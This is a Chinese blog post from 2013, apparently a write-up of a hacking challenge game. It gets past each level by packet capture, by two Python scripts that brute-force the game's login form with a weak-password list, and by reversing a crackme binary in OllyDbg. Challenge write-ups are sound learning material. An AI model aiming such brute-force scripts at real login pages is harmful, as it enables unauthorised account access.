F4CK 游戏通关历险记

于 2013-01-16 16:24:22 发布
阅读量2.1k 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/emaste_r/article/details/8509927
本文记录了一次破解游戏的全过程,从抓包发现入口到利用Python脚本破解密码,再到逆向工程解析指令,最终成功通关。

游戏地址

声明:本博文意在记载作者自己的点滴,同时欢迎更多的朋友走上hackme和crackme这条路。
注意:尽量自己动手,尽量不给f4ck带来麻烦。

第一关

随便哪个抓包软件(我用的是WSExplorer),然后就发现了地址:

http://game.f4ck.net/jfasdsdlml.html

 

第二关

用python写了个脚本:

__author__="ouyang"
__date__ ="$2013-1-15 14:39:34$"
 
import httplib
import urllib
 
 
if __name__ == "__main__":
   headers ={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Encoding':'gzip,deflate',
              'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
               'Cache-Control':'max-age=0',
              'Connection':'keep-alive',
               'Host':'game.f4ck.net',
              'Referer':'http://game.f4ck.net/jfasdsdlml.html',
               'User-Agent':'Mozilla/5.0(Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0',
               'Content-Type':'application/x-www-form-urlencoded'
              }
   url = 'game.f4ck.net'
   path = '/login2.php'
   passfile = "weakpass.txt"
   inStream = file(passfile,"r")
   for tmpLine in inStream:
       params = urllib.urlencode({'log':'登录','password':tmpLine.strip('\n')})
       conn = httplib.HTTPConnection(url)
       conn.request('POST',path,params,headers)
       response = conn.getresponse()
       if response.status == 302:
           print tmpLine
           break
       conn.close()
inStream.close()

就跑出密码了:f9ck

 

第三关

在第二关代码上做了些修改:

__author__="ouyang"
__date__ ="$2013-1-15 14:39:34$"
 
import httplib
import urllib
import random
import string
 
if __name__ == "__main__":
   headers ={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Encoding':'gzip,deflate',
              'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
               'Cache-Control':'max-age=0',
               'Connection':'keep-alive',
               'Host':'game.f4ck.net',
               'Referer':'http://game.f4ck.net/jfasdsdlml.html',
               'User-Agent':'Mozilla/5.0(Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0',
               'Content-Type':'application/x-www-form-urlencoded'
              }
   url = 'game.f4ck.net'
   path = '/login.php'
   pass_file = "weakpass.txt"
   inStream = file(pass_file,"r")
   finished = False
   try:
       for line in inStream:
           for i in range(10):
                base = line.strip('\n')
                for j in range(5):
                    data =base[:j]+str(i)+base[j:]
                    #POST send package
                    params =urllib.urlencode({'log':'%B5%C7%C2%BC','password':data})
                    conn =httplib.HTTPConnection(url)
                   conn.request('POST',path,params,headers)
                    response =conn.getresponse()
                    print str(i),data,response.length
                   
                    #if error then length is29,if correct then !29
                    if response.length != 82:
                        print "the key is: ",data
                        finished = True
                        break
                    response.close()
                    conn.close()
                if finished :break
           if finished : break
   except Exception , e:
           print e
   inStream.close()

跑出密码是:f4ck9



第四关

先用PEiD查壳,发现竟然没壳,OD架起,用“超级字符串参考”寻找Ascii字符串,然后在OK之前停住,随便逆向了下,而且特别简单。

指令如下:

00401053  |.  C745 F8 D0070>MOV DWORD PTR SS:[EBP-8],7D0
0040105A  |.  C745 F4 B80B0>MOV DWORD PTR SS:[EBP-C],0BB8
00401061  |.  8B4D FC       MOV ECX,DWORD PTR SS:[EBP-4]
00401064  |.  034D F8       ADD ECX,DWORD PTR SS:[EBP-8]
00401067  |.  894D F0       MOV DWORD PTR SS:[EBP-10],ECX            ;  crackme.00429AA0
0040106A  |.  8B55 F8       MOV EDX,DWORD PTR SS:[EBP-8]
0040106D  |.  0355 F4       ADD EDX,DWORD PTR SS:[EBP-C]
00401070  |.  8955 EC       MOV DWORD PTR SS:[EBP-14],EDX            ;  crackme.00429AA0
00401073  |.  8B45 F4       MOV EAX,DWORD PTR SS:[EBP-C]
00401076  |.  0345 FC       ADD EAX,DWORD PTR SS:[EBP-4]
00401079  |.  8945 E8       MOV DWORD PTR SS:[EBP-18],EAX
0040107C  |.  8B4D F0       MOV ECX,DWORD PTR SS:[EBP-10]
0040107F  |.  81C1 F4010000 ADD ECX,1F4
00401085  |.  894D F0       MOV DWORD PTR SS:[EBP-10],ECX            ;  crackme.00429AA0
00401088  |.  8B55 E8       MOV EDX,DWORD PTR SS:[EBP-18]
0040108B  |.  81EA F4010000 SUB EDX,1F4
00401091  |.  8955 E8       MOV DWORD PTR SS:[EBP-18],EDX            ;  crackme.00429AA0
00401094  |.  C745 E4 00000>MOV DWORD PTR SS:[EBP-1C],0
0040109B  |.  C645 E0 4B    MOV BYTE PTR SS:[EBP-20],4B
0040109F  |.  C645 DC 4E    MOV BYTE PTR SS:[EBP-24],4E
004010A3  |.  8B45 F8       MOV EAX,DWORD PTR SS:[EBP-8]
004010A6  |.  3B45 F4       CMP EAX,DWORD PTR SS:[EBP-C]
004010A9  |.  75 0D         JNZ SHORT crackme.004010B8
004010AB  |.  68 38704200   PUSH crackme.00427038                    ; /NO
004010B0  |.  E8 5B020000   CALL crackme.00401310                    ; \crackme.00401310
004010B5  |.  83C4 04       ADD ESP,4
004010B8  |>  50            PUSH EAX
004010B9  |.  58            POP EAX                                  ;  ntdll.7C930738
004010BA  |.  51            PUSH ECX                                 ;  crackme.00429AA0
004010BB  |.  59            POP ECX                                  ;  ntdll.7C930738
004010BC  |.  B8 64000000   MOV EAX,64
004010C1  |.  05 C8000000   ADD EAX,0C8
004010C6  |.  BB 04000000   MOV EBX,4
004010CB  |.  03C3          ADD EAX,EBX
004010CD  |.  33C9          XOR ECX,ECX                              ;  crackme.00429AA0
004010CF  |.  85C9          TEST ECX,ECX                             ;  crackme.00429AA0
004010D1  |.  74 0D         JE SHORT crackme.004010E0
004010D3  |.  68 34704200   PUSH crackme.00427034                    ; /OK
004010D8  |.  E8 33020000   CALL crackme.00401310                    ; \crackme.00401310
004010DD  |.  83C4 04       ADD ESP,4
004010E0  |>  03C3          ADD EAX,EBX
004010E2  |.  BB 0A000000   MOV EBX,0A
004010E7  |.  40            INC EAX
004010E8  |.  43            INC EBX
004010E9  |.  90            NOP
004010EA  |.  90            NOP
004010EB  |.  90            NOP
004010EC  |.  83C0 0A       ADD EAX,0A
004010EF  |.  8B4D F0       MOV ECX,DWORD PTR SS:[EBP-10]        ;这里是关键
004010F2  |.  3B4D EC       CMP ECX,DWORD PTR SS:[EBP-14]        ;比较EBP-10和EBP-14地址的内容
004010F5  |.  75 28         JNZ SHORT crackme.0040111F
004010F7  |.  8B55 F0       MOV EDX,DWORD PTR SS:[EBP-10]
004010FA  |.  3B55 E8       CMP EDX,DWORD PTR SS:[EBP-18]
004010FD  |.  75 20         JNZ SHORT crackme.0040111F
004010FF  |.  8B45 EC       MOV EAX,DWORD PTR SS:[EBP-14]
00401102  |.  3B45 E8       CMP EAX,DWORD PTR SS:[EBP-18]
00401105  |.  75 18         JNZ SHORT crackme.0040111F

大概讲的是X + 7D0 + 1F4 == 7D0 + BB8 ,然后简单运算下就出来了X是9C4H

很容易就得到答案为 2500(D)

进入 2500.php

恭喜通关。

 

 

 

 

 

ouyangbro
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值